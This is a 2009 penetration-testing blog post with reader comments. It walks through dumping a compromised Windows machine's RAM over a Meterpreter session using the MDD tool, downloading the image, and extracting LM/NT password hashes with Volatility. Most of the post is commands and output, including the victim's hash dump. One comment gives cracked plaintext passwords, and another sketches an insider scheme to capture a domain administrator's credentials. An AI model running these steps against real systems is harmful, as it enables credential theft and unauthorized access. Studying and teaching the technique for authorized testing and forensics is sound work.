Sunday, March 8, 2009

Dumping Memory to Extract Password Hashes


Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from: http://pauldotcom.com/wiki/index.php/Episode142

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:

C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt, really doesnt matter as we are going to be pulling down 256+ MB of data we wont exactly be "stealthy"

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

Now that we have our .dd image locally you can utilize instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the passwords out of memory.

Volatility --> https://www.volatilesystems.com/default/volatility

Installation and getting started: Download and unzip volatility from the above location, download and install the patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html --> http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once you are done when you run python volatility you should have the hivescan/hivelist options as well as other stuff.

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Couple of updates

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/

CG

13 comments:

Anonymous said...

Wow excellent tutorial.

Thx Chris

Matt Weir said...

Stupid question, but why would you bother dumping the memory for windows password hashes since there are easier ways to get them. It looks like you already have administrator rights on the box you broke into. Does it work if you have lower privileges?

I do have to say though that it would be good to get full hard disk encryption passwords, (or at least the encryption keys), remotely.

BTW, great tutorial.

CG said...

@matt

great question. I need to go back and reproduce as a non admin user via client-side attack and see if you can actually get a memory dump.

if you can, then it has "some" value because now i could get the hashes where before i could not. if not you can essentially get the same thing since they are local hashes using hashdump.

i just saw it on pdc and wanted to see if could reproduce and if it was useful.

i personally probably wont ever be able use it on a pentest as moving around 500+ MB of data would probably alert someone on networks we usually take a look at. someone in the metasploit silc chan suggested looking into packaging up the python code into .exe and seeing if you can do the processing victim side. that may be useful as well. it would be bloated but certainly less than 500 MB

wishi said...

Normally you shouldn't be able to dump the memory of elevated processes.
What bugs me much more than hashes are authentications, that (may) lie in RAM. If you grep through the dumps you can find a lot more.

Anyhow: Windows isn't well known for hardended user separation. So it seems to be a piece of cake nowadays to gain elevated privileges. ;)

Anonymous said...

Great writeup. I tried this out last weekend to see if I could squeeze it into an Exploitation class I was running. It's interesting stuff, but as somebody already pointed out, you can get these hashes other ways (hashdump from the PRIV module).

From my testing I couldn't manage to get a full memory dump without administrator permission on the target. Still, dumping the hashes is probably just the start of what can be done with the Volatility toolkit. I look forward to the next step.

Anonymous said...

Of course you can get the hashes through other techniques, but as we all know there are many ways to skin a cat, and the more techniques you know, the stronger your FU is.

Jean-Michel PICOD said...

On Vista (and maybe Seven too), it's even simplier coz you don't have to upload the memory dump tool anymore. As far as I have seen, Vista automatically keeps an up-to-date hiberfil.sys (maybe in case of powerfailure).
So you already have a memory dump. You can also download pagefile.sys for even more fun recovering passwords.
Oh and it's also true for some XP computers if they used at least once the hibernate function (though the file may be outdated...).

Anonymous said...

And your passwords are
Neon1996 (Administrator)
Neon96 (phoenix)

Unknown said...

I've tried this tutorial like 5 times, all with the same results. This is the errormessage:
ERR: Couldn't find subkey Lsa of Control
> Traceback (most recent call last):
> File "volatility", line 219, in
> main()
> File "volatility", line 215, in main
> command.execute()
> File "memory_plugins/registry/hashdump.py", line 67, in execute
> dump_memory_hashes(addr_space, types, self.opts.syshive, self.opts.samhive, Profile())
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 302, in dump_memory_hashes
> dump_hashes(sysaddr, samaddr, profile)
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 290, in dump_hashes
> hbootkey = get_hbootkey(samaddr,bootkey,profile)
> File "/opt/metasploit3/msf3/Volatility/forensics/win32/hashdump.py", line 156, in get_hbootkey
> md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
> TypeError: cannot concatenate 'str' and 'NoneType' objects
> ^C

I've tried every possible way to make it work, but it doesn't seem to work no matter what I do.

CG said...

@patrik

its been awhile but i think this only worked on SP2 due to some issues with volatility. there is a thread on their blog talking about it.

as you didnt say what OS you were trying it on my first guess its that its one of the unsupported OSes.

-CG

Unknown said...

The OS is XP sp2.
Im running it in Sun Virtual Box, and my theory is that since the os only uses like 192 MB ram, that it might be the problem.

I've tried a different solution though, that actually worked.
I used mdd to dump the ram on a Win7 client with 2GB ram.
And runned a regular expression on the .dd file and grepped the hashes that way.

Unknown said...

Am I wrong in assuming that the most dangerous use is the following:
-You work in a big company with many Windows PCs. You log in via a domain controller, but( in case there are network problems), there is also a local admin account.
With rainbow tables, you can get the local admin account, so you log in as local admin. Then you call for remote support citing a possible problem. When the domain admin logs in remotely, you dump the memory and get admin access. Am I missing something here?

Anonymous said...

@Patrik:

What regular expression did you use for that job?